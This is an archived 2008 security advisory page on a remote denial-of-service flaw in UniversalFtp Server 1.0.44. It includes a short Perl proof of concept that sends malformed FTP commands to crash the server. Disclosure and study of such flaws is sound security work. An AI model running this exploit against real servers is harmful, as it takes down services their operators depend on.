SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

UniversalFtp Server 1.0.44 Multiple Remote Denial of service


Arrow  SecurityAlert : 4722
Arrow  CVE : CVE-2008-5431
Arrow  CWE : CWE-20
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
Arrow  Credit : securfrog gmail com
Arrow  Published : 15.12.2008

Arrow  Affected Software : 5e5:teamtek_universal_ftp_server:1.0.50
5e5:teamtek_universal_ftp_server:1.0.44



Arrow  Advisory Content :  

# UniversalFtp Server 1.0.44 Multiple Remote #Denial of service

#

#@nolife : This bug has been found with a brain , ten fingers, a keyboard ,
and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools
hint .

#

#

# Réponse: 226 Completed...

# Statut: Liste du répertoire complétée

# Commande : LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...... .........
...........

# Réponse: 150 Directory...

# Statut: ftpcontrolsocket.cpp(1764): Waiting for replies to skip before
sending next command... caller=0p12e69f8 --> 0_o

#

#functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A)

#

#

# PoC :

use Net::FTP;

(($target = $ARGV[0])) || die "usage:$0 <target> <port>";

my $user = "anonymous";

my $pass = "something";

print "Trying to connect to :$target...\n";

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect";

print "Connected!\n";

$ftp->login($user, $pass);

$ftp->cwd("AA");

print "Poc Successfull the server should down now \n";

$ftp->quit;



Arrow  References :

http://www.securityfocus.com/archive/1/archive/1/488142/100/200/threaded




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.